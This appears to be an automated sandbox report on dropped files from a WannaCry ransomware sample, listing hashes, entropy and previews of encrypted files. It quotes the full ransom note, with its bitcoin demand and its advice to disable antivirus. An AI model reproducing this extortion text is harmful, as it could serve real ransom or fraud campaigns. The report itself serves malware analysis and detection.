                                SHA1:833D57810D30680E02B660EB563BB04F4DDDF5FA
                                SHA-256:33EA6E1DFBCDC4798810550352B572B834CFBD4A6AA9AB89371548C95E1D7C21
                                SHA-512:E9E114F004404776BE3CE4EFD89A766875CF46608C845092B092E31A6CA053CEAF8AFAC7B98F3631369F70443369415F86DD4005B81B3FFE11A8772D77864238
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.804780018876966
                                Encrypted:false
                                SSDEEP:24:9D31lcqYi/49DE8dppMbsuONsnbj2INWhuUWn8dLuV40pPArA/5G1:tXYm4DVMbDu0uCdf8dLDyA+0
                                MD5:C231839DC1C5CE1D32565E2FFEAC4FD8
                                SHA1:8A99C026BAD317D1FE7CDC4F9E1EB8EB4C7EBD67
                                SHA-256:560DEE3466145A22C6F1C42878E64BBE48FDB0A1465EA73AF2704ADDC307B780
                                SHA-512:87ACD03D5A43AEFEE06654E7F3A01E8BEFABE4C4CD3720E959B6E52A8B17656B9A8D958DD4BA1B25FD6971345C4B6B3443ED14CCA76C443CC71F1BC31A0C8FF6
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.7890687824907205
                                Encrypted:false
                                SSDEEP:24:ClEYDtc3FsjP0ognDgAxuIRvgnthzfZgaBciLY0HHcQaFhaV:hYwEVIRq3f9jyIV
                                MD5:F7343BD5F29B8C58BCFF3E614D4D38D9
                                SHA1:829D7981456455E37F4655D40DA21351FF4F9DEB
                                SHA-256:ACB3AC32CCD3A9A8BBCCE408C0A2872647A30619FBF74CFF08526F35BC16A3D3
                                SHA-512:9167C3A6C071AA543FFC3002CB370D9595E96C648742707CEC192F6174FE09715AB9E118D6FCA6B3B7F9EB7536783B60ACD4E6AB9376FDBFDD1409AA1400D719
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.816065791627852
                                Encrypted:false
                                SSDEEP:24:XA/QelHQdzx7sNJMHdzY3ACH7mfWfi/TYr5WBcC+sgx4iqINeW8Tt:lelHQd14DtwCyefcMWJtgjNb0t
                                MD5:BF4C2365BB9FBCD1162E1EC258549B0C
                                SHA1:561D6664F94B1297EB4F006EBD2AE32E357B3B25
                                SHA-256:B73EDB43F6A87BF019147BAAEF3EE4EFAD7ADD9EA407D3C8E86C958D9FC2C6D5
                                SHA-512:07E49F772AF37F485224C6A796F6777638DEBDF07C943D989CA860256305757A52EC58CF665EC382175C55C2A95EB55B0C3CD8C53EF37A8323A38A5C0FC6B50D
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.816974575934229
                                Encrypted:false
                                SSDEEP:24:ZJmBGAFzpnwj5id5X0BsVJrHa+j3Vt8uxXelyeCrDI0zS:ZJDuzpwiX86Jr6mz81T+cIS
                                MD5:C2D45E591B2BFB07DE3A63CFC11AE1EC
                                SHA1:09B378A13C3A9C37068E7AC5FF67BF4172C85F63
                                SHA-256:6E403983BE0D65B884610200B6D2024C38C668E92ECC3321D6167F0EB8EBD67C
                                SHA-512:06B2E34D1EE65298A9813F3440E80B9CB4B1703EF84576769D79DDDF05A6AFDFF9CC3121DD29AEEED3F5BBE28D4D60D88E64AB38478061F13E20498838E1F172
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.748464623869378
                                Encrypted:false
                                SSDEEP:24:+/IwmtBIok4HuDmTQ+YgFik8GZi/BFgYXyYNG:+/Iw0xOs3YgjZi/ByYa
                                MD5:5FCF31736EACB90E0BE98D0BC6748C2F
                                SHA1:4DC0996AB9CC9C46A034891E37EA6056F64552D8
                                SHA-256:B76993FBBFC0E7B390D96D1BAE8618DF9134F90C6718A7030FA2B8632294D9ED
                                SHA-512:4A620580609D771BEE02DB009F344920DF5C459785432C034A1F55D1855AC54165516070A84C776805B930A6E41447B9D21F234B0F333F4C51F6E7C736A5E766
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:OpenPGP Secret Key
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.821736657797796
                                Encrypted:false
                                SSDEEP:24:ox00OXrinJmitWAYKqJhxtdImlXJtaUYoXPnO9xuCC9fMRLmJ:oJObgJZtbqhImlZb/O9kfSW
                                MD5:FA4B7799C649E18CDFD9C2D7DEDCEE91
                                SHA1:03EFAA14F650E48677537F7F88A7E6B2BB0F42A1
                                SHA-256:5FF9E5FCBAB200E22DCD20F717BD758E0FA222D6FBC9C95F994303F9C121F632
                                SHA-512:F33EEA0D1EA75657CD05A3DD22EC1913C5D2E1045146826D360CD69CBDC3707BA3FC2D18CEF24271364B224F2F136B5E97500AF6477C13A920E003B4B7411A74
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.798945641474471
                                Encrypted:false
                                SSDEEP:24:Of65gI3p8oIb5v9ZWblQnNdochn9ZOBC9RhrdPLQ1wr/dK6:C83p8NNoYn9mCBdPVDdK6
                                MD5:55F0410C87961EE951EDA57A3A15223A
                                SHA1:236BB0E545382D0D767DD26647EFB07960B24523
                                SHA-256:6231E2BA2F03609A39DC28E1296B799B6B22E6345581D7EBD3B407A9B7CF4DFF
                                SHA-512:6F2C71447FA8F385A51290088A93430CFBBBC13FB1CB28040A9FAAF9716F3E84ADA50BFD9ECE6F1FF44651933611FEF70FB611814D7AB5363350314633667A57
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.811179423008834
                                Encrypted:false
                                SSDEEP:24:RiAOXebtyU4Sr3tDECOeMHtsXvaYJKBVasMJ4YGFPjqh:RVDbtvDBKeMHtkiYJ0TYQj2
                                MD5:80B7F146405BDE958A0118421809840A
                                SHA1:F9A740FFFFFDB94A8DDAB5F434457B5A07A3A2BE
                                SHA-256:489400DB440459DA81B1C2C0CB0D0E6AE4F620FA8625B374D00728A71C6686E7
                                SHA-512:A32FC3B3868A0A5EC4027E40918FF352090CD40FA1CBD7EAEF2DA96A494D60DD8A58B34D56A57D8388B427077F32AE1EBFE162808508647C8594E15C7211B9EB
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.7834522779236845
                                Encrypted:false
                                SSDEEP:24:BwQ/rj0jYEh7UtD2r06bzAFnAeqnahwP7VS:SQ/r457TI6opdqCwP78
                                MD5:80D963B9CC37AB3C327BF6E628BC376E
                                SHA1:2EF8AA9A691EDBF0ADF3C6EE2E8555D478C7F6DF
                                SHA-256:F81AE5D8830FA56F477C0E89590CDDA87EB508C086FF363BBA3F84E2E8A86CD8
                                SHA-512:CAD9D9476E5348B195461156BC81A2CE5B747186EB48AA1EA82D6D9018D1B97D0BED4B5E97D0546E304668BD707598AD4FECFEB8691B0538C2EF748446CAC756
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Preview:L..................F.... ....{..5...{..5.......................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....Y.5....Y.5....t.2......J.. .@WANAD~1.EXE..X......?V..?V.......b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........0-.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226533..............n4UB.. .|..o..,........P..#.....n4UB.. .|..o..,........P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):52120
                                Entropy (8bit):7.996175589039157
                                Encrypted:true
                                SSDEEP:768:94l5ZhiuM1Q6j8k0IKPoSUJLSnc0YHMNhOOaAVAQ7ZecUrEcnJpb+g/OdWm0RF:eXZhiuwjV0xPPGS4HMNqLc6EU9+eOuF
                                MD5:23DF858D272A0C6CC0E05BDFAA7FAE4C
                                SHA1:50B8EF93C001B00FEC953DDB0FF315B4A3DA7370
                                SHA-256:1DB8E4715BCEA2332C907F644FD72E45F77964B7DC89D892BBFA8D99254A81BA
                                SHA-512:0812F5B9F93D4C2807CB3CF1D6EA4DE86ADA74DA45EA463A1CECA24C26508A3B3D4389BF535A535FED09D6455822F0E5B703010F8D6E9E5B40CBA757416A8236
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!...."..Q..0LlB.J.......|;...y"].....>;.7B2...XE..7=u.5C. U.......w?}-.....>M...0A.o.5.....T.4....8.$U.0....;.._D:}..)C(H.{....;...*..4......C.Ht..E.../...f.Q.d..@..m.}0.~.`6;....R@.Q..E^C.....[....7R/.0.j.+.s.!..6.tG.n8_.8d.7..M..C..}dD2.....X...T. .....r........$..7.....DH&g..4..".....mDa..KU]*...:.QA....'CU-..PT.....4.....<....=G..).@..sY..J.Db..i0b..>....z%...S........=..q......xO.H...Y....B..o..L-(...M4s>&5,f'...G*...S_.B8...=`%...aC...b....T:.....(......z.vl.x.k.g...!.D...8...|4..4..B..is.w..maR....}..5...Y......C .l7{........\..K..Y..%r...|Jh.8f|.....$7.+|..?Ul........x.`........&.G..+.?.L~N.'_.f.*/G..U...Mq. $..yp0...{...?.v..Z1muod....fA.2o9gK.+.(AG}W...q.3..oW....+.9.=0Iqj.8...Wf.....U......*i..(zD......c..p.E...PV.j-P...!...G.|..s.>.'.9.......kc...j...[....1..Z..d......~+..n.F...L.y.tf...v.".g.3......:J..b.rO...._K].M.$.97.>1*<N*....8UT.(....P?X.c..v.:.....Z!..%"....u....Mi..;Zb.LOV...Bj..X_.H[...O......Au.+.g..Za...9.}
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):47576
                                Entropy (8bit):7.996351379468486
                                Encrypted:true
                                SSDEEP:768:PIAnuiL98SeaPqel3jjy/c6xFaTJLaQ0Ux9SDNFHPA8YZP+zJst5xnkdRDysxO:AAnu+lRQUxsDNdAtP+zORniS
                                MD5:B918EC7728E524724F1CDFD950FB41F8
                                SHA1:6F8E1D5D48E13EEACE78E930AC2F951832C3CBB2
                                SHA-256:2FAD24BC329700A5368199743D33C94497D2E9377DA7FB7239A6B77B6C4EA69B
                                SHA-512:EAC79FF76430164C0115FED61D45E35E42E5DBE8F3B96A943771B54EB75A78A57B3634FE696707CF1B031D96404D02B05DDC97B75A6B4D5CE6ABE5960414D51F
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.....w...pKi...K. ...m..v&...=..3..qMpAs*E.G..r..5X...@`.Z...D9X."R..OX..4.^..".....ecH}a.W3j.8ft...A.......e.>.X*..Qa...*...e...<@&..^..........Zo(..5...Sc........U...*C../--...t.VK.5.........]....=Q...........Cw....{O.$.:...?j..../....>?.].v.................&....a.E....>.${......p.i....C'.^...=..t.....-..H.~..K.%.T..P....G.q..~u.8.'..|Z=.F.._...9..l.mmR84%.|y.9n. u.Z..d.'....G.....C}:..\=-+.........r..'...~/*..B..<...w..d.;..l.S...PH..j.TS..?...-....K.b._q...k@^...a.'1.t..x......SFh.$....B....;...!B.Z7....`~...;...,.{.\..R=.9..M..k......E 7......Q[...@..p?p.pp....M.&..".....<.F.....L.^..t....8.|..ee..d.[7.uZ..e....U....25O.6m..k.........T.a...D..;ZF'7M:.e.......w.*.W.o.Z...n.A..!......^YT...7..#..1...X8E.....qI.m...G6.....y..v..n..R.. .Pu:...^T.Z....j..."....g....Fm......f...B5.`.4.. ...+...X.&UF...;..W./+$R..57.8.R.$V..9%n.....k.;.4.........ch...8..\1/.;.88...d.+........3..9...{`..Y............o...5.....?...*.......*...4
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):34696
                                Entropy (8bit):7.994598581571153
                                Encrypted:true
                                SSDEEP:768:kcigdwdx+ZerEfehP/eaTc6+7KkQeRlSZ0vZD/XNzJLWf0AqXo:k3dQZer4eNdw6y8SJvRHo
                                MD5:A199A84DAC2A9F726409FB1F3F2D996F
                                SHA1:A1BFE1F2CD408C7DDF05962F55BEA38042E88434
                                SHA-256:A4FA1B8D293D48375277B6C9BCDE75484993644AA351662C15B2AF40572A5C94
                                SHA-512:6CE028DD62F1C3E03213FF2437D8A057ED9CA379D1C6ECB9FFAB76F6CBAC89D5D7EAE86BFA274DDD48F274914F8323C3DBF20A8BE2B2A047225AB8B7EB0EBAB9
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.....`..8y?gJa.,..ir@.Q.0Q ..EH_...zmR'...x_.+Om.jo.O.Ju9.D.Mo.yf.#...i...d\.K.2.;...-.5?...97....2..c....w.n.w.2L.O....f....S.@1.....!.)."..i......w..Iw.'-.D..D.3..U.:..hY.$.LG..pAwR......G..;..FiG.9......3$"..Z`f.w>.*}-d..$...4>.Z........>.M.....o.......N....T.../WF.).5.{.....%...u.8....r.\.;G...}..).8#PVOk.I........|.\.k........R.>@Kf.pU..I....).:Q....}...Hp...t.J...r.0P}...E...{:....`.....e.u.1...d...b...=..g.._lF...G.....k.....).|:j..`D........#/....QS.....c^..0R...@.....aQ.(.......\........W:....Wj.Wi#^.\.X.|...uD.(..`...e.%...q....>._I...+.`.SD......o.I&........P..)(..rj......2q.\.~...F..=..EF.......r....*.....C.H....**5........Bn......4t.(D2.8.Q..!...."....Q'B...n..Jt..t.#............O....<Jb.K...z.?....1....\.d..h...m..7..7x..2.1s.....".?J..N!...VA.-.6p6-.>..#...........r.).[...~....^jk.`.g..."..R..~J9..T.&'.......ZJ..h..6.mk....S...*..[....Q...X...i..a.B.wp&.t...1....|.3....sP$}".Ba....b.........R............y.]
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3465368
                                Entropy (8bit):7.99995237144597
                                Encrypted:true
                                SSDEEP:98304:5qMRDoROmiQeMUjeL4MSlHxOe8to8qB7L6DE1TAa:Qn1eMqxxmo8qBt
                                MD5:175D11FA61918FE712061DF2210E7F97
                                SHA1:00486413B416B640A17C2983A41FF194E90CE7C5
                                SHA-256:BC8FD8476108D87F46C27DBE02493E062972C79894622C48040FA277009DC240
                                SHA-512:4D23A0F03F7469C0F89B19F10DD54B992D986BD81569EEDFF4287E5267EFDD81AA15456F9997847649B3EEC7C3EEB5473F94C23FF33549EE4F94871CFC3DBD91
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!......9..kBf.a\....+zW........^....`q.D.~qu..x..o.},.+wB..&..|..{.H....'...f.........Eg...<9.}F;...?.A.p.|.{m..b....?.......W..G.....;NT......$..wG.I....Q........&..I.:.Q.o...Z...^.%2mCs<...a_.C......r.:..Vm..I9........Rz.I...{_.{^|.'...X.Y....t.4......)..I.l..*@e..FU~P,.%.......E....;...L....?...)...\.T..........."....D......{&@S."t..I..sm..@.\`...;...>g5>....cH.Ib#.5.N...p../................_.v#....l..m.S..0.+..O"..>.k>..:.z.M,H..}....`V...n...Z....p...&.............:.e.(.v.uR.w}H/..#.4..O....g......."..i.]i.....G..B...h.k..|a|...x+..1..x.X..&.,R...p/...;.EZh.Iy.Z.k1Ru>._.X..2r..+.qp.../!.].P.1.5Q.......5.0v.......Y....s..g<y6....v{..|.L.b%.~1"!..R.....".J.o.C......W.E&.~...g..+..4.(...6.v .....K.*......4S...Osb..y..g.+.NJ .6...j...^... ...N..c:.j.h.a%..<..x..B.G]..@k.........|.c...=... ,>.J.Z.$.:.T(...;...C.rv.`...D.;b.....M.G.qBVXN..3.c...2K%e ]..:.B..R.....-..g..e.IS.._...xn@..JQm:.v..c..y....`.M....;.f...o.....@.qM..
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):19560
                                Entropy (8bit):7.991019120973622
                                Encrypted:true
                                SSDEEP:384:JP0ItloPY2CrxR0QCw1iLuv7DZhAYWEwULgiaGyyc6cxdyjFP4:ZCPCYTCZvhgi5yyJsyjK
                                MD5:D55A80B8DEAAD6E1AABF497402349060
                                SHA1:867EB8B063F48A7112603A2D0FAFA9F1BC9789BF
                                SHA-256:B395A5A9066E72EB588C4FA59EBE4C26A73BE3C5C59C83ABBFF256CC951D9B3E
                                SHA-512:23B920D3F4096B99DDDBFF92C9FA16AD3077C1AF1EC0F04274E0BB9A65319030DC8C1C3BEBC0194D05B7A2C51B3547B13563E11DF15CE17DAF6B2CB2092F280B
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....H.;.I.M....@...S'.)..p.M.&!@........./d.m.Kt.[$..tK...d.V.zyz.....<V..s1P....I........L.....L...P..:..fE...q.......h:@.......h..U..m.m...`....m.+.........x..q.,...).aKh).5..b.nk.5p..}.yJ......^m..3...nr..:=..!m.~w.C.@.=...cx'.p..pw.0(..{.........GK.......wm<....f..\:.Az.v.[.Rz...5I8......yHz;..9...)Bf.J.<.Y.?S....F...g.j...........+.y6<...%.J^M%.........yj..Pj;...z....J.Fw....z&.^?.#...O..%d.Q/.."y....K. N4...s.QF.y.....?.......%@.,....#rhAt.K..l....7.z|..cI.O.....P..t.N.o...a./...cT..m..<f+.A.P.j.8.;.8.....sw...4){.Z...m`.ed..~.-.6c..s#........\,.>q@.......8....D..t.....Z.7.>...2\..v....l....70^....7.2.!.t.o?.PvK.&..!........vP./c0.8._.p.....,.5...8.n.....=4?k"..g.Z...)C.o...Vx...V.i....8`....Y.......e./z.N.V.......wT.9X..eL.d..m.Q..w.CD.o....&IB .H.<.m.A..cNL....mIV}...pL<....c\..X...N.&S.iSt.z.*..d...~......b...i..Pi..)NY.@..o-...MH..s.*C(.d.di......M....Y....wd.Y....)..pn....q.0.C.A..02..9......{.Q.!.F.X'..1.....~....J..d%Q6A.0
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):40984
                                Entropy (8bit):7.995595406679536
                                Encrypted:true
                                SSDEEP:768:6qu5OgHQLsYLHSU857FRWjO0HG3YaqI4vw89blWR+g/i:hgHQLpLHeFsOiKB4vwwIE6i
                                MD5:FC29968C24759B854B7C57EAEFBB45B5
                                SHA1:ECC5CCAA47554B3AB01EC8FF5DD15E519C9F3A2F
                                SHA-256:F56374B89593DA2B66F37BC640896EAF73DD09BFA568087B28B8733E712943AB
                                SHA-512:B3E6694F2486C565600731B4B4EF8A46F00EEDCAD5134C4B5369838C5C2907F43A989BE71D8E8A27014E8E1D0D1A1F2A29044D6401CC3C3A42D28433BD852A04
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!......(..}z.....].t.a.V....of.Wd_?...;.OP..~.....8..<.Sp.C.....a....J.....o|a...,..N^.h. (...h.}.....,....+....y..u.+.j(.h....M........@....(.....J..v...4.{Q. ....[&.W......{..+..f:g.y\.2..Js'.\,6<......bN9D.Um..z0.7..Y_..a...a|v..G.s.\.s=S.Ii...'................=,>.h...$.F...,h.Z~.F]Lr....M........)R0i..Rh..e.P........ka<-sI,...z<...3....%%g.9.;.G....J..."Mu(l.=.../..O...a.........{.gd......L.H........Ac....'.{.(.....{?/.qt.Vp...K..<.v....g....#.|(Dzu.....p.6....r..Z>..S.V(^.EV....nx.W.f...'.8.b.a25...x...cG....d.V.......".k.;....dc..z.....B.\..`+.A..bt..N.e..Y.[.M,q{.G.]YN.....C6j..8S/..<.l..a...tY{...^%......;....\..Xx......>).HD.l.x...c.......?G*./v.p...D..:..s......H.m*.G........Ys...um.U..V..(...yS..L...s9..s....mMH....b..-.G`...l^..6..? .d.+.VA...N6r.1.....Y..{..iW..Ar.....Ip...q~.T.B.a.v.f5.@'G..@......zL.2.-..^\......"kJ........J.>..h.N.......?.$Y..<d......O..L.....:.`...."V ...[Kj..i........]....ij..K.)+.....
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):125288
                                Entropy (8bit):7.998553445878312
                                Encrypted:true
                                SSDEEP:3072:tE14rNsx9SzsvmgucpQ2pZyHzaBgTY6PBbtEZSLN:tEWrIksVjpQzYgnZbtV
                                MD5:07FC11CE9850703CFE71441FCAB3EA41
                                SHA1:B82DF49233927E9932AE21955FA560D3B45D2945
                                SHA-256:EA6FF0AAAD53A050E54FF471CE77DDC5C70F17866606401AED2E5F7CE4C5AC27
                                SHA-512:B28C6DB2EE79CC345ACFE5AAAF4B8A801E530FB5A8B97205C04DF122855187769D5D831F054FFEC146D6AF5458D7AD0CF6D86090F4003024D43683290F3ED48C
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....f.. .A.. =.(ME..f..va._uS.)2...$..9.mP......Rp .~.%1ob/..^....I.%$...u....zL........`.. ......I]Z.k..sy..Ay...S.`._..Y.v.^..K..A...Q.........#m.&.?.+#......N.!,..#...UZ......./.......K..P...P.`..[@..]...b...x@..S^....Y...Q1.").Hr.x.......Ih.X1....D........P.<`....v.\..S.{..:...j.S..`..y,.nj..W.P..o.G.....F...|F^.i..}.p..#!94.d..&...6.....vo..:y.......m.....J.'l.t.:.Q.\o.G......r....6...".m6T.]... P..1C."./._.+8H..1. ...M..g....f"m/..}M..U.Y,.....V....o|s..$.\E@.!._..s..9.....y.Rl.eD.......2...-..,\...E............%w....k+.#.}m9kK....cv7j6....B.....-.c.+....FI>R.:.o..n.e.?.s4Oe.W!..>....+....<.08.*.6......tR.\..N4v...8...;.1.."=h...W``.q.....[5.:+U.33.R.n..L.M.e0.0#.....x.E>....b.t..fu...!..8R.v.-9W..Y.zC..J...Z.}..m..t..8....-w...K..z.=m$...m. ...].1;6c......W....9>..Q*..#..a.i...w...9..6.&.l....8.TW...G.^.L....A...MW...)..T2..U...fm,r...>x.Y..X..BB..;[..nU.K....fu1.dn+.q.....3M..J...U.I....v..Sf.. ....v.....CS..%?.......y1V
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):888
                                Entropy (8bit):7.7709234856926885
                                Encrypted:false
                                SSDEEP:24:bkWAAXeNPHQPVnaYlTsilAX90WEyuCbNWtY/z1YLNn:bkxeGYOilAXFbuCbYSZYLNn
                                MD5:2A9DCDEC4642240B53CDD247835386A8
                                SHA1:52B71AA054B37FC6371A09612568D240D32FA546
                                SHA-256:4322AFF96A8C7185AE4505DF24FC366553BEFF03F18A40BCD20977E679F06506
                                SHA-512:F3A57C99D54877804170D358A1B47BF52D09814FC468A52103ECAE2E137F53C6B1B088082A09E217636E08BF395C6B5ADEFC59FBF87425760563F70046AB35D0
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....}(T4*..%.zKm3E......\'.....KLH..S.:.0....mO8..j..l..e...I..2'...L.[{.6$.ly.o,..b.d....5.R.....=..g.S..f..uco..@K$shd)f..H.T.8H...w.=....\m+ B.....,...A.|..L..G....}....u+..x....7.ZS ..|`.}....7B~R...a.B.gq.g..J..]\lN....L...+.;.|...S.M...dV....X..........41Bz.+...9}.b...|....#O..|...m....Ft.lv..>....Yu$..C#.{<,.L....|..1l.g.Y ..[....*.k:.t..P.,Blr.,..^E.....:!.A.R............L....[...Y.+..%F.C...8..j@.!..+..."P....P1;.9...H.Uyn..Ls.s.P\z...,r]..)(.U@....R. ...dx/..X.>DS.`.P.4..4..*.L.k.K{.x..p..+.h......o(.[.T..R~..1.Z$6J.....ey..G..7K./(U....3l.E.t:...5........... .......bh{)[.........W.3......0K..I.x.r..e'...o...s7.)g../.~....wy......6.0^s...ub-T.......&09.._.....#......`{..P......=..+s.83.Gf.. 2..1....L~..8X.UM\.^.y,(W...U.Z..Q...b-.U.+...7......ns.I:6.....,..K..."....C..Y....(..;8eV/...>.A.0H.2.<$..zn:...G.
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):888
                                Entropy (8bit):7.774113899585453
                                Encrypted:false
                                SSDEEP:24:bkhbW31RyAhFZYzd/Haw4fLJdfmkMyLvAhaVBeyfQr:bkhbW31RJsd/HaxJTLvAhaVBeyor
                                MD5:9EF48ABAAA6D22EF8144B8B624728AEE
                                SHA1:A4433A1A25D70F2E8124AA8EC3527BA2692550E4
                                SHA-256:3E971E7B7D23147603D2E312EF0D4051CEFBF159C414CFC4C0DAEAE30459DD5C
                                SHA-512:F3B27FE6874DC1E2A2952FED49C64C2E23C8E75D7660C958CC77CDCBBAE0B00FD5B39C09743707F5217D94820875CE19BCBE4EEF8A1F5638BF839BF12D73E39D
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....b.6.s.o.6.X..H.............+;....5`."`..aJ.. ..F.=...si..oy..{@..5.u.Vp.... U.i.......E_.U...p3..1.+.Fu.1...f"$x[]..4......p.....E..~9.l.i.<t.uu~......X.....L.g...~.B.w.)..M../:S..??...g.........dV.w..Al..1...8-.T..H......7...........<.| 3`....W.......@....Z...A.4.knS.oj.:4...k....w;..C...r....6~..K...?....l.....v...].91Y..b..Wx..=.y.#...D(.".9..e...F,.......V.].]g.(..e.#/............H.T.fF...7.....)b....L...RA.Z.V....R|'#...}..+KbY..M}.[L....e...9...s_.?...}....4R.P.-..X.....!.q.Y.."C..j@E.w..!..k.+.a.#_..W..!ng2..`..>..)b..S..[e....V.......IUWS.....ym.~.h.'_..;..h].........Z..Q..4ru3.LH...).C.pv...b..9:..H.{S..r.....V.r.O}P.S..j...0!h.........g9.K..b.l..;.[.4...FA[..[..O.=.$..a.]LME..?..W..l.}...)".:x_...&l.%GF...q....I./W........N....V...3...d...i?.}B...k..`@H<E...d...a.h.D....4..S...)\.......(.7._.0...
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):229656
                                Entropy (8bit):7.999204363239014
                                Encrypted:true
                                SSDEEP:6144:IsOkPpIlGNMNuY7MBAZFo8UJJmBpSWTgz1egE:Is/P2lfDM/8U3m7SHegE
                                MD5:B4A202DDBF8E194DF1517A4BA0D91BE9
                                SHA1:00568D99CB33E1A93B117B17A50771F99D24BDC4
                                SHA-256:D771E4B8A1B5624E31CA0A4719F7273F395ED25621E4BDB5B0EF38D384EE865C
                                SHA-512:15ED034049389B54EA5BA4518CB6EDD37555C231412E36709C3DA2887CAA7F87F37FBDBAC288AD13E75C3A3C1C9795EE9C1CF66E9DEA9CA9C24AC68785FADCBA
                                Malicious:true
                                Reputation:unknown
